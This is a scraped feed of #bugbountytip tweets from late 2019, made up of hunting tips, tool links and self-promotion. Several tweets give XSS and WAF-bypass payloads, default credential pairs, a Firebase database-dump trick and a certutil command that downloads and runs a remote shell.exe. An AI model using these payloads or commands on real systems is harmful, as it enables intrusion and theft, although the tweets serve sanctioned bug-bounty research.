2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their technics and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use “blue” knowledge for “red” approaches or #bugbounty

@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Haven’t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - “X-Marathon-Leader” - “ssl:Redacted” “X-Marathon-Leader”
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting???#bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture:Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip
sudo ls /usr/local/protected 🔴
@AbdulConsole


2019-12-02 23:50:45
0 You don’t want to look at the website from a bird’s eye view and find low hanging fruit i.e, security vulnerabilities without any serious impact. #bughunting #bugbountytip #bugbountytips
Avanish Pathak
@avanish46


2019-12-02 18:33:32
0 Short Note On The $3000 XSS Found On the Public Program on @Bugcrowd #bugbountytip #bugbounty https://t.co/Avh1EW66KA https://t.co/Ef7EW6LwSg
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:07:17
0 Million Users PII Leak Data Leak Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/XOMt0BJnnn
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:03:30
0 How I could delete Facebook Ask for Recommendations post’s place objects in comments Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/3jmDgBbzsK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:00:08
2 Subdomain Takeover Via Campaignmonitor . Com Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/nmegpRCRSs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:58:31
0 Subdomain Takeover Via https://t.co/CYXQhAOtlh https://t.co/nmegpRCRSs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:55:23
0 Disable Any Unconfirmed Account in Facebook https://t.co/p2TQTXMYW5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:52:38
0 Prowler: AWS CIS Benchmark Tool https://t.co/TfvuLHUcqN Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:48:25
2 Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. https://t.co/ABDslQah52 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #DevOps
Fisher
@Regala_


2019-12-02 16:28:59
2 I did this super tiny extension a while back that you can now find in the BApp Store. Just go to your Site Map -> Select All -> Right click -> Copy sub domains 🙂 #bugbounty #bugbountytip https://t.co/DiwqY76TUk
ghostlulz
@ghostlulz1337


2019-12-02 15:23:47
0 ITS CYBER MONDAY. If your looking to make a living doing bug bounties you may want to get a copy of my book. I'll show you exactly how I operate. This is the last time i'll post this 🙂 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #osint #infosec #dfir https://t.co/VZ8FJPVoIO
Dujunayan
@dujunayan


2019-12-02 15:11:29
0 Google it, this's how make shit done <3 #bugbountytip
%00Termi
@Termi1215


2019-12-02 14:26:50
0 Sometimes i just wonder from where @ippsec has got all the knowledge in the world. Oscp , pentesting , bug bounty,red team just watch his videos. @elonmusk of pentesting world. #bugbounty #bugbountytip
ALL ABOUT HACKER
@AboutHacking


2019-12-02 13:21:30
0 How to start Bug Bounty Read -: https://t.co/b9iplwe1i8 #bugbountytip #bugbounty #bugbountytips #cybersecurity https://t.co/tkIgmb7yBH
🇳🇬Sam-Olayemi
@cykic_


2019-12-02 06:58:32
1 XSS cheat sheet contains many vectors that can help you bypass WAFs and filters #CyberSecurity #bugbountytip https://t.co/HfYpEaiOZ6
securibee 🐝
@securibee


2019-12-02 05:26:50
2 Free course "Automate the Boring Stuff with Python Programming" https://t.co/VfpiAK9jgw #bugbountytip #infosec
Sanketh Sharath
@sharathsanketh


2019-12-02 05:03:25
0 I use the community edition of Burp for bug hunting. Its a great tool, but I am really glad I am investing time learning how to use Zap too. This way I could leverage the features I am missing out on the Burp Pro edition. #bugbounty #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-01 22:10:28
6 If you are looking to make 🤑money🤑 as a pentester or bug bounty hunter you will want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED!💰💰 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #infosec #redteam #osint #dfir #pentest https://t.co/gmUrqA1tW7
soon
@soon73564093


2019-12-01 18:20:31
3 Xss Go: https://t.co/hIsozDABTH Paste payload: "><script>alert(document.domain)</script> or "><script>alert(document.cookie)</script> @EBHORSMAN #bugbounty #bugbountytip https://t.co/kOp6LxATOV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-01 18:09:43
1 Subscribe to Our Telegram Channel and Never miss an update on Zero day and New Bug Bounty Tips and Tricks https://t.co/pfl0JWOIqo Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #pentest
Brijesh Shah
@Brijesh1997


2019-12-01 16:44:37
0 URGENT: Best wordlists for fuzzing subdomains required. Found subdomain/assets/6193029F7C344C93BC50CBDBDC9AC91E.xls Need to find what else is exposed publicly. #bugbounty #bugbountytip #bugbountytips
lordsaibat
@lordsaibat


2019-12-01 13:58:37
1 @RealTryHackMe This is a great start into hacking and bug bounties if you are looking. All the rooms give you clear targets to hunt for. #bugbountytip #Hacking #infosec
Brute Logic
@brutelogic


2019-12-01 13:33:23
3 Old #bugbountytip from 5 years ago! https://t.co/7I6aZ5Fo6v
ninetynine
@ninetyn1ne_


2019-12-01 09:49:33
1 Quick tip - If Cross Origin Request allowed only from https://*.target.com, then try finding an XSS on any subdomain of the target, even if they are out of scope, and initiate a CORS request using that XSS. 🤘🤘 #bugbountytip #BugBounty
David Dale
@meathacker


2019-12-01 04:01:02
0 Hearing about IDORs? Not sure what they are? https://t.co/3MEbfcCL4j Great resource! #bugbountytip @Bugcrowd @samhouston
Armin Gojak
@fyoozr


2019-11-30 22:52:18
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/A7PsjSLSQQ #bugbounty #bugbountytip
Laszlo Kokai
@kokail


2019-11-30 20:43:11
0 RT @rez0__: Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/76981mCgLk #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Leonishan
@leonishan_


2019-11-30 19:32:04
3 Exploiting XSS with 20 characters limitation #XSS #bypass #bugbountytip #bugbounty https://t.co/k51H9OkNso
Ammar Amer🇸🇾
@cry__pto


2019-11-30 18:03:10
12 -1-Multiple Ways to Get root through Writable File.pdf: https://t.co/442zfZCBtm -2-CTF Series : Vulnerable Machines.pdf: https://t.co/DJMEurYB0d -3-Red Team Tips.pdf: https://t.co/NAJAIeEsK7 #bugbountytip #redteam #PenTest #Hacking #ctf #cybersecurity #infosec #BugBounty #OSINT
Sebastian Wieseler
@kickino


2019-11-30 05:16:25
1 Btw, my slides from my @div0_sg talk about XSS vulnerabilities are here: https://t.co/X968arapPd Enjoy 🙂 #bugbountytip #bugbountytools #bugbounty #togetherwehitharder
𝚛 𝚎 𝚣 𝟶
@rez0__


2019-11-30 03:14:29
1 Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/37N78DLalr #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Brijesh Shah
@Brijesh1997


2019-11-29 19:08:04
2 dig A <subdomain> is returning <subdomain> 60 IN SOA https://t.co/SBKgEiAHvQ. https://t.co/UerpKCDxNL 1 7200 900 120960060 Can i takover this subdomain? #bugbounty #bugbountytip #bugbountytips
ALL ABOUT HACKER
@AboutHacking


2019-11-29 18:54:34
0 Cross Site Scripting attack Basic to advance [ part 7]- Basic Burp suite Read:https://t.co/GRACpUbkBi #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/YF94iI795N
Hussein Daher
@HusseiN98D


2019-11-29 18:40:48
0 This was a really hard time for me, I'm back now. Thanks to everyone for your support and all the messages I got. A #bugbountytip will follow soon. Take care
ghostlulz
@ghostlulz1337


2019-11-29 12:55:16
0 Today is BLACK FRIDAY! If you are trying to make a living doing bug bounties you may want to get a copy of my latest book. I show you exactly how I hunt from start to finish. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #BlackFriday2019 #osint #dfir #infosec https://t.co/d1zC3PS0XR
intigriti
@intigriti


2019-11-29 12:38:38
3 🛍️It's also #BlackFriday in #BugBounty land 🛒! Harvest all the coupon codes, try this #BugBountyTip by @quintenvi and score some bounties! 💰 https://t.co/mZnQGkOnF3
Arif Khan
@payloadartist


2019-11-29 06:56:15
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/d998DJHlHm #bugbounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-11-28 23:28:18
7 -Top 40 Best Linux Commands Cheat Sheet. Get It Free Now.pdf: https://t.co/2iKmWinQuN -Complete Google Dorks List in 2019 For Ethical Hacking and Penetration Testing.pdf: https://t.co/hdYVSGNQYs -Blue Team Tips.pdf: https://t.co/lq74aWZo9x #OSINT #bugbountytip #Linux #pentest
bugbountytip
@a_l_e_r_t_1_


2019-11-28 21:05:30
0 Happy Thanksgiving!! Bug bounty tips just 1 $ for 8 hours. Lets go guys. 😂 Lets hacking.. https://t.co/JPaA4CKmfO #bugbountytips #bugbountytip https://t.co/ZEIBuwiUDl
bugbountytip
@a_l_e_r_t_1_


2019-11-28 19:29:47
0 Hi guys. Subscribe my youtube channel for PoC and tutorial videos.. https://t.co/yyqYNBzlhi #Bugbountytips #Bugbountytip
chaitanya
@chaitanya0888


2019-11-28 19:17:14
3 #bugbounty #bugbountytips #bugbountytip 😂😂😂😂😂😂🤣 So, I got 1year free VPN from @wifimask Thanks to wifimask https://t.co/zLrurx34Zm
Pascal S
@PascalSec


2019-11-28 16:58:06
0 #bugbountytip huge productivity boost needed? Go and check out https://t.co/aZfbzgYuLc in case you use Firefox for testing. This eases multiple account / tenant testing by a mile. Shoutout to @infenet, who showed me this add-on in the first place! 🥳
ईशान सिंह
@R0X4R


2019-11-28 10:24:17
1 Something interesting for Bug Bounty Hunters. #bugbountytips #bugbounty #bugbountytip #bughunter #hacker #hacking https://t.co/sN4tuXtDce
Random Robbie
@Random_Robbie


2019-11-28 09:25:29
3 #bugbountytip when dealing with ysoserial and windows machines get a shell by doing certutil.exe -urlcache -split -f http://yoursite/shell.exe shell.exe & shell.exe Downloads and renames file and then runs it. save messing with powershell struggles.
Hendrik
@hendrikvb


2019-11-27 21:08:43
1 Grab your #pentesting course fix here during super #blackfriday deal at @PentesterLab #infosec #bugbountytip https://t.co/R2M2j9Q3dO
Elsadat
@M0_SADAT


2019-11-27 19:20:34
3 Today I finished my exams and So excited to find P1 after 2 hours of testing at private program found SQL injection😁and while reporting the issue discovered it's Out of scope subdomain💔 #bugbountytip read the target scope carefully to avoid this kind of heartbreaks #bugbounty
Paweł Hałdrzyński
@phaldrzynski


2019-11-27 18:32:50
2 @Hogarth45_ND @plmaltais You can make it even shorter (and get rid of white-space characters): text'/\u0061\u006C\u0065\u0072\u0074`1`// or when slashes are forbidden: text'-\u0061\u006C\u0065\u0072\u0074`1`-' #xss #bugbountytip
Johns
@Johnssimon22


2019-11-27 14:18:10
2 How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature #bugbountytip #bugbounty https://t.co/q6O93zv2uu
AkaaZaan
@AkaaZaan


2019-11-27 12:07:36
0 infosec people drop links, where I can learn Regex!!! #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-11-27 11:55:50
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/sGQVdvW3cY
bugbountytip
@a_l_e_r_t_1_


2019-11-27 10:50:40
0 Party Time for laravel 😅 #bugbountytips #bugbountytip https://t.co/mubsogY68J
ghostlulz
@ghostlulz1337


2019-11-27 05:25:02
9 There are tuns of tools for horizontal and vertical domain enumeration. I like to use Amass. In my youtube video I explain how to effectively use Amass in your reconnaissance process. https://t.co/ysW9JguyCV #bugbounty #bugbountytip #bugbountytips #infosec #amass #redteam
Ammar Amer🇸🇾
@cry__pto


2019-11-26 23:19:33
5 -subscribe to my youtube channel now -advanced videos tutorials about all hacking fields -parrotsec OS is the OS that gonna be used in the courses -learn ethical hacking in detail. https://t.co/m2akiMCaZI #bugbountytip #redteam #pentest #cybersecurity #malware
bugbountytip
@a_l_e_r_t_1_


2019-11-26 19:03:28
0 Look everywhere. Every user input, every parameter, cookies, headers . You can do it. All you need is patience and more reading.. #bugbountytip #bugbountytips https://t.co/Z49RnHRAxC
Vivek Yadav💙 #Scaffold
@viveky259259


2019-11-26 18:40:26
0 Here's one more bug. This time by Spotify. In #payment section. When I choose #UPI as #payment at that time it should ask me #upi id/pin/address not postal pin. @Spotify @spotifyindia @BugBountyHQ #bugbountytip #bug #music #app #AndroidDev #SpotifyPremium https://t.co/HQ3J1V6mrA
ghostlulz
@ghostlulz1337


2019-11-26 18:21:56
8 Seriously, another unauthenticated database. Google Firebase is a ripe target for getting easy wins, just append "/.json" to the URL and it dumps the entire database. More info on my blog: https://t.co/WGzatNLO3C #BugBounty #bugbountytips #bugbountytip #firebase #infosec
Ananda Dhakal
@dhakal_ananda


2019-11-26 15:36:59
1 Feedback from a private program on @Hacker0x01. They had closed the report as N/A because they did not quite get the report. I made sure to provide all the details clearly once again and it is pending resolution. [1/2] #hackerone #bugbounty #bugbountytip https://t.co/kris0pXagG
Üzeyir 👨🏻‍💻
@destanuzeyirr


2019-11-26 12:57:15
0 Does anyone know Cookie Based XXE , I may need some help #bugbounty #bugbountytip #togetherwehitharder
Ammar Amer🇸🇾
@cry__pto


2019-11-26 11:28:52
3 -Undetectable C#&C++ Reverse Shells.pdf: https://t.co/08CJhmLAbr -35+ Best Free NMap Tutorials and Courses.pdf: https://t.co/wNd4XNabzv -HTB: Luke.pdf https://t.co/dFYLXTo7zb -How to become a cybersecurity pro.pdf: https://t.co/ODbsUfZpe4 #bugbountytip #hacking #pentest #redteam
Alexander Khovansky
@al_khovansky


2019-11-26 07:50:56
0 *cough* Command-Option-F dangerouslySetInnerHTML *cough* #bugbountytip https://t.co/QScWlAc9Km
tololovejoi
@tolo7010


2019-11-26 00:27:09
2 Your weakness is determined by how do you live with your success. Your strength is determined by how do you handle your difficulties. #motivation #bugbounty #bugbountytip #infosec #hacking #bugbountytips #motivationquotes
Ismayil Tahmazov
@Tismayil1


2019-11-25 21:36:00
0 Sharing is good. Sharing increases happiness. #bugbounty #bugbountytip #bugbountytips #infosec @Nep_1337_1998 https://t.co/VWoZ4xc7cG
Brodie Codie
@brodie_codie


2019-11-25 20:41:20
0 I started doing #bugbounty in Sept, set a goal to reach top 50 in this program... Almost there Tip 2. KEEP READING #movingup #10000Hours #KEEPGOING #perseverance #Bugbountytip #bugbounty @emenalf 👀 https://t.co/YK0XF6uxkb
m0z
@LooseSecurity


2019-11-25 16:42:45
0 Someone just told me they once found company credentials on pastebin. #bugbountytip #bugbounty #bugbountytips #bugbounties #infosec
Security Executions Code
@pwn0sec


2019-11-25 16:35:17
0 Web cache poisoning attack https://t.co/G5ahhQidlh #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
drivertom
@drivertomtt


2019-11-25 16:13:40
0 @Xiaomi #bugbountytips #bugbountytip Never dig ANY vulnerabilities in products that are not admitted by their vendors. https://t.co/MpBnJuVmIh
Security Executions Code
@pwn0sec


2019-11-25 14:46:07
0 Web cache poisoning attack https://t.co/VPiOxCGk3K #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Wh11teW0lf
@Wh11teW0lf


2019-11-25 11:23:55
5 #bugbountytip Default credentials that i always try: admin:admin test:test admin:password admin:pass [email protected]:test [email protected]:test (try with all domains that belong to company) [email protected]:[email protected],com
Security Executions Code
@pwn0sec


2019-11-25 10:50:26
0 Bug Bounty Panasonic : Reflected (XSS) Vulnerability https://t.co/LnMgHCYvxW #bugbounty #bugbountytip #bugbountytips #xss
Pankaj 🇳🇵🇮🇳 🇷🇺
@Nep_1337_1998


2019-11-25 10:47:48
0 Thank you @Tismayil1 for your notes Yes I was awarded with €600. 😍😍 Tools Sub Scanner : https://t.co/hZCWhAbzEm Dir Scanner : https://t.co/9n9y4T5EXE Git Dumper : https://t.co/7z9cdDA26W #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/SLAzoRn8Nz
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 08:13:46
0 Look out the window...if that’s not your dream view...get back to work! #bugbountytip
nutronex
@nutronex


2019-11-25 07:12:48
0 Lfi (cannot use log poison)> download source codes > found database credentials > found hidden admin panel > tried to login admin panel with these credentials > success > file upload > rce #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 06:07:56
0 Cool video about vim 😀 #bugbountytip https://t.co/tBsAbNk3UO️
ninetynine
@ninetyn1ne_


2019-11-25 04:43:27
0 Quick tip - If '/something' => 403 Try - '/something/' '/something/%20' '/something.html' '/something.json '/something/?anything' '/something#' Works sometimes🤘 Happy hacking....!!! #bugbounty #bugbountytip
Mashoud1122
@mashoud1122


2019-11-24 21:42:23
1 I just published my 1st Write UP.Writing it was harder than I thought. here you go: CORS Misconfiguration ->Account TakeOver [Out of scope to grab items In-Scope] #BugBounty #BugBountyTip #BugBountyTips https://t.co/6Ke09g37L5
Nosense
@Nosense08537389


2019-11-24 19:57:15
1 Hello friends! Im trying the exploit 44298 with kernel 4.4.0-87 and ubuntu 16.04.3 but when i run it it provides me invalid argument. May someone can help me what i should do? #bugbounty #hackthebox #PenTest #bountybug #bugbountytip #CyberSecurity #Hacking
👻in🐚
@0xerror


2019-11-24 19:09:39
3 XSS News: @spyerror: 'Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/XopkzOyBE8, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-11-24 19:09:39
2 Top story: @spyerror: 'Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/mW90LakWPL, see more https://t.co/fVnXn9Z0FJ
Pratik Yadav
@PratikY9967


2019-11-24 17:31:01
8 Ssti while sending money from one account to another .I inserted a normal payload {{7*7}} in note section. Probably others have missed this bug because no one want to spend small amount for testing . #bugbounty #bugbountytip https://t.co/k4dq1Xa3Tn
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2019-11-24 13:24:05
6 Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec https://t.co/oHTNwiv6Au
ghostlulz
@ghostlulz1337


2019-11-24 13:21:21
9 If your wanting to become a full time bug bounty hunter or penetration tester you may want to get a copy of my book. WARNING INDUSTRY SECRETES WILL BE DROPPED. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytip #infosec #appsec #redteam #PenTest #DFIR #OSINT #xss https://t.co/iBiJBKWwPU
vinod3070
@vinod3070


2019-11-24 11:37:41
0 It's a project management tool, if I put my vps link in the group chat box I get GET req to my VPS. Nothing else is working. Any leads ? #bugbountytips #bugbountytip #hackerone #recon #ssrf
luis madero
@_Y000_


2019-11-24 00:27:50
3 Explotando vulnerabilidad CORS.(cross origin resource sharing) #hacked #cors #bugbountytip #bugbounty #CyberSecurity https://t.co/vWzRICB3T1
Shammah Agwor
@Zealsham


2019-11-23 23:01:26
0 Search shodan for “aquatone_report.html” get access to dozen of recon data from other bug hunters 😂😂. #Bugbountytip #bugbounty
Halil AHMAD
@Halilahmadd


2019-11-23 21:39:11
4 Cloudflare Bypass Payload:<svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security @XssPayloads
healthyoutlet
@healthyoutlet


2019-11-23 20:49:38
0 Get all the urls out of a sitemap.xml with curl and xmllint in a bash oneliner. curl -s https://t.co/A6bYnXdhNI | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' #bugbountytip
ticarpi
@ticarpi


2019-11-23 20:40:15
3 jwt_tool v1.3.2 now has improved 'Spoof JWKS' functionality https://t.co/yA6KVOSEqO #jwt #jwks #bugbountytip #netsec https://t.co/uH8H4LwB9J
Pavandeep
@Pavandep8


2019-11-23 15:43:20
0 Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium @MIUI| #bugbountytip #Hacker #security https://t.co/deek38JH50
Nick || hunt4p1zza
@ngkogkos


2019-11-23 15:08:38
6 Burp has many features to help your workflow & better -> more bugs. In my @Burp_Suite proxy, I constantly use a search regex pattern that includes standard placeholders I use within my payloads, such as zzz/xss, and I keep adding to it. #burpsuitetip #bugbountytip #BugBounty https://t.co/3CHDtFGQeF
Paresh
@Paresh_parmar1


2019-11-23 10:10:04
8 #bugbountytip decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there. #bugbountytips . https://t.co/eZPSqnAbWV
ninetynine
@ninetyn1ne_


2019-11-23 08:24:59
0 XSS tip - when looking for XSS, try functions like - 'confirm()' and 'eval()' instead of 'alert()' & 'prompt()' to bypass the WAF. 🧐 #bugbountytip #BugBounty
ghostlulz
@ghostlulz1337


2019-11-23 07:08:39
9 Expanding your scope on a bug bounty program is a great way to gain more vulnerabilities.Horizontal domain enumeration is a technique used to find domains of an organization. More information on my youtube video: https://t.co/nrVeAWSmxV #bugbountytip #BugBounty #bugbountytips
HackIsOn ®
@hackison


2019-11-23 04:44:08
13 Everytime shodan gives a surprise to our #cybersecurity community 😎😎 Utilise it everyone 🤗 #BugBounty #bugbountytip #bugbountytips #hacking #cybersecurity #linux #Ubuntu #hacking #hackers #owasp #bug #vulnerability #redteam #redteaming https://t.co/XAYGEChP7d
Ammar Amer🇸🇾
@cry__pto


2019-11-22 19:13:56
15 -Web Application Penetration Testing Course.pdf: https://t.co/GlebM7I7b0 -20 Best HTML Cheat Sheet Of 2019 | With All New HTML5 Tags.pdf: https://t.co/59tuOLtNSb -Fasten your Recon process using Shell Scripting.pdf: https://t.co/33JZAQ2k4n #html #Hacking #bugbountytip #PenTest
healthyoutlet
@healthyoutlet


2019-11-22 18:41:00
0 1) Find as many domains as you can that are owned by the target org: https://t.co/sTkppJra4w 2) run subdomain discovery on all of them 3) make a wordlist of all discovered subdomains 4) run massdns on in scope domains with that wordlist. #bugbountytip
florens
@florens25301329


2019-11-22 17:27:55
0 Need some help to exploit DOM-XSS will share bounty! #BugBounty #bugbountytip #togetherwehitharder
Yash sariya
@stylish_hacker_


2019-11-22 08:33:44
0 How to become a successful bug hunter https://t.co/nYs8qifcA0 #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:32:27
0 What is web server fingerprint https://t.co/BdmKPXFPpd #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:26:59
0 Complete Recon Process A to z https://t.co/msMzOd0Ja7 #bugbountytip #bugbounty #bugbountytips
Udit Bhadauria
@udit_thakkur


2019-11-22 06:59:54
0 @NahamSec just uploaded his talk at @defcon "Owning The Clout Through SSRF" with @daeken! https://t.co/jb7XuGIXyN The pdf can be found: https://t.co/R7gbIXgItf & if you want to practice it, consider looking into @PentesterLab's exercise of brown badge. #infosec #bugbountytip
Brodie Codie
@brodie_codie


2019-11-22 05:04:54
0 so aquatone has it's own probe to check if links are alive with this option found 2 admin panes this way "cat List.txt| aquatone -ports xlarge" #bugbountytips #bugbountytip
Securisec 🚀
@securisec


2019-11-22 01:33:31
0 "RT RT Tismayil1: Yes I earned $3180. Tools : Sub Scanner : https://t.co/VcdATHEpOs Dir Scanner : https://t.co/HJAwQE187M Git Dumper : https://t.co/ZKqKYdHhkG #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/UGa0yAvGEx"
healthyoutlet
@healthyoutlet


2019-11-21 23:14:43
0 #bugbountytip keep your hackerone inbox open so that it's super easy to check for updates on that crit every 15 minutes for the next week. Bonus tip: Have a pint of ben and jerry's ready for when it gets marked dupe.
Binit Ghimire
@WHOISbinit


2019-11-21 19:51:51
1 When you are using a XSS payload in email field during registration and it doesn't execute after creating the account, try choosing the "Resend Activation Email" option. Developers are likely to forget filtering the email in activation email resent message. #XSS #BugBountyTip
Ismayil Tahmazov
@Tismayil1


2019-11-21 19:03:42
18 Yes I earned $3180. Tools : Sub Scanner : https://t.co/LegySAU3sZ Dir Scanner : https://t.co/1L6MutcaEc Git Dumper : https://t.co/IOsHlTWCP2 #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/6Qy1JEiDWM
Vikash Chaudhary
@OffensiveHunter


2019-11-21 05:31:42
2 #BugBountyTip completes the first checklist that I gave it to you yesterday, now move to on these vulnerabilities spend some time to read about these topics. if you want to learn live bug bounty hunting you can subscribe to my second course i.e Offensive…https://t.co/ji3V0Sxi5a
Mourad
@SecuAudit


2019-11-20 22:27:32
0 The worst Bug Bounty program : You spend your holidays trying to help them to secure their online business . after 45days when you ask for an update they just get worse and treat you like shit in return ,Bug Hunters have no value in this chain #bugbountytip #BugBounty #pentesting
florens
@florens25301329


2019-11-20 20:18:04
2 Finally got the last bit working so i can finish the practical for XXE!! Notes will be available today/tomorrow! #bugbountytip #Bugbounty
itsmenaga
@nagarockshard


2019-11-20 17:17:24
0 After seeing *.domain.com ...Recon Script Pop-ups 😛😂 #BadBugBountyPickUpLines #bugbountytip
Yadhavi
@PrincessYadhavi


2019-11-20 16:57:27
